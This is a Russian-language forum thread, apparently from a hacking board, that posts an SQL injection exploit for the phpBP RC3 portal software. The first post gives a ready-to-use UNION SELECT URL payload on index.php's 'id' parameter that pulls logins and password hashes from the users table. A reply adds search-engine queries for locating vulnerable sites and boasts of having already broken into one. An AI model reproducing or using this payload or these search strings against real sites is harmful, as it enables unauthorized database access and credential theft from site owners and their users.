SQL-инъекция в phpBP

Статус
В этой теме нельзя размещать новые ответы.

d1mka

Постоялец
Регистрация
19 Мар 2007
Сообщения
92
Реакции
25
Программа: phpBP RC3 (2.204) FIX4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

Для просмотра ссылки Войди или Зарегистрируйся[path]/index.php?function=banner_out&id=10000/* */LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F, login,0x5F,pass),4,5,6,7,8,9/**/FROM/* */phpbp_users/**/LIMIT/**/1/*
 
  • Заблокирован
  • #2
Искать в гугле можно так
но так почти ничего нет, лучше так
"PHP BP jest darmowym polskim systemem portalowym."
т.е. во ссылочка на результаты =)


p.s. может ешсть ешё какие? просто эти сам взял как обычно снизу с копирайтов =) а их могут убрать (копирайты)

А куда прикидывает (у меня это
это и есть логин_пароль в md5
уже доступ от 1 сайта получил =)
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху